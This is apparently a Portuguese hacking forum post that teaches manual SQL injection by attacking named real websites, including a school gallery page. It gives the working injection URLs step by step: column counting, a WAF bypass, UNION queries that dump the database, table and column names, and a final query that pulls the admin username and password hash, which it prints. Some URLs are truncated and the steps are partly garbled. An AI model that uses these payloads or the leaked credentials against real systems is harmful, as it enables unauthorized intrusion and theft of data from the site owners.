vou tratar dos sites onde podemos ganhar experiência em Manuel Sql Injection, do simples ao difícil... Cada site significa uma nova informação, uma nova experiência.
Blind SQL Injection: Blind SQL Injection (ou seja, Blind) Sql injection é para interromper a estrutura da página sem dar uma saída de erro na página da Web. Por exemplo, vamos considerar uma página simples com um img no meio e um artigo descrevendo o img abaixo isto. Digamos .php?id=xx em nossa página. Quando colocamos o caractere .php?id=xx'(quote), ele não mostra img naquela página, ou não mostra img mas não texto. ou se não mostrar uma parte do artigo, pode haver uma vulnerabilidade de Blind SQL Injection nesta página da web.
Nosso site com amostra Blind SQL Injection;
Código:
http://www.marywardlubhu.edu.np/gallery.php?cat_id=6
Quando colocamos "'" (aspas);
Código:
http://www.ise.ac/index.php?ID=11'
Olha, as fotos e os textos não vieram, agora vamos descobrir o número de colunas, como
sabemos, amigos, quando vamos via /index.php?ID=11'+order+by+1, a página não nos recebe corretamente, para isso adicionamos (URL BALANCER) --+- bypass. .
Código:
http://www.ise.ac/index.php?ID=11'+order+by+1--+-
Sim, a página está carregada normalmente agora, vamos aumentando uma a uma até que as imagens e textos não estejam na página como antes. Precisamos encontrar o número de colunas.
Código:
http://www.marywardlubhu.edu.np/gallery … r+by+7--+-
Em 7, img e textos não vieram, então nosso número de coluna é 6
Agora vamos refletir nossas colunas fracas...
Código:
http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-
Sim, temos um WAF.
Vamos ignorar o WAF e seguir em frente.
Código:
http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-
Normalmente ele deveria dar nosso cólon fraco, mas não o fez. Agora vamos adicionar um apóstrofo (-) à esquerda de 6
Código
http://www.marywardlubhu.edu.np/gallery … ,4,5,6--+-
Sim, agora trouxe nossas colunas fracas. Nossas 4 e 1 colunas fracas. Vou continuar com 4.
Código:
http://www.marywardlubhu.edu.np/gallery … 3,database(),5,6--+-
Sim, o nome do nosso banco de dados é maryward_maryward. Vamos continuar com nossas operações clássicas.
Código:
http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x6d617279776172645f6d61727977617264),5,6--+-
Sim, tenho minhas tabelas, vou precisar de tbl_admin daqui. Vou puxar minhas colunas agora.
Código:
http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),5,6--+-
Sim, como você pode ver, ele me deu minhas colunas em tbl_admin. Agora o que eu preciso aqui é nome de usuário e senha. Vamos aprender isso. Amigos, nesta fase, não aconteceu quando tentei contato em grupo, mas quando dei uma tacada, deu-me o nome de usuário e a senha. Dependendo da situação, isso pode mudar em suas ações.
Código:
http://www.marywardlubhu.edu.np/gallery … T*/+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(maryward_maryward.tbl_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3c62723e))))x),5,6--+-
Sim, como você pode ver, ele me deu o nome de usuário e a senha em um hash. Descarregamos o site com sucesso.
Nome de usuário: M#&*5$#ExQ!-+
Senha: 20e041a68eefa994cc7dd29bc2235dc0